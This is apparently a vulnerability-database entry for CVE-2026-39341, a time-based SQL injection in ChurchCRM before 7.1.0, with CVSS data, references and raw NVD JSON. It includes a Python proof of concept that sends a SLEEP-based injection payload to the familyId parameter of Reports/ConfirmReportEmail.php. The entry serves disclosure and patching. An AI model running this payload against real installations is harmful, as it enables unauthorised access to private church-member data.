CVE-2026-39341

Description

ChurchCRM is an open-source church management system. Prior to 7.1.0, the application is vulnerable to time-based SQL injection due to an improper input validation. Endpoint Reports/ConfirmReportEmail.php?familyId= is not correctly sanitising user input, specifically, the sanitised input is not used to create the SQL query. This vulnerability is fixed in 7.1.0.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE

ChurchCRM < 7.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
import requests
import time

def exploit_sqli(target_url):
    """
    PoC for CVE-2026-39341
    Target: ChurchCRM < 7.1.0
    Endpoint: /Reports/ConfirmReportEmail.php?familyId=
    Type: Time-based SQL Injection
    """
    # Construct the vulnerable endpoint
    full_url = f"{target_url}/Reports/ConfirmReportEmail.php"
    
    # Payload to trigger time-based delay
    # Checks if the database waits for 5 seconds
    payload = "?familyId=1' AND SLEEP(5)-- -"
    
    print(f"[*] Sending payload to: {full_url}")
    
    try:
        start_time = time.time()
        response = requests.get(full_url + payload, timeout=10)
        end_time = time.time()
        
        elapsed_time = end_time - start_time
        
        if elapsed_time >= 5:
            print(f"[+] Vulnerability confirmed! Response took {elapsed_time:.2f} seconds.")
            print("[+] The application is vulnerable to CVE-2026-39341.")
        else:
            print(f"[-] Vulnerability not detected. Response took {elapsed_time:.2f} seconds.")
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error during request: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost"
    exploit_sqli(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-39341
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-39341
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-39341/
[4] VulDB https://vuldb.com/cve/CVE-2026-39341
[5] https://github.com/ChurchCRM/CRM/security/advisories/GHSA-3h69-vjff-jj5c

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-39341", "sourceIdentifier": "[email protected]", "published": "2026-04-07T18:16:46.150", "lastModified": "2026-04-15T20:09:52.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Prior to 7.1.0, the application is vulnerable to time-based SQL injection due to an improper input validation. Endpoint Reports/ConfirmReportEmail.php?familyId= is not correctly sanitising user input, specifically, the sanitised input is not used to create the SQL query. This vulnerability is fixed in 7.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.1.0", "matchCriteriaId": "BF846F61-0C1E-49AB-B691-A01937A6C24D"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-3h69-vjff-jj5c", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}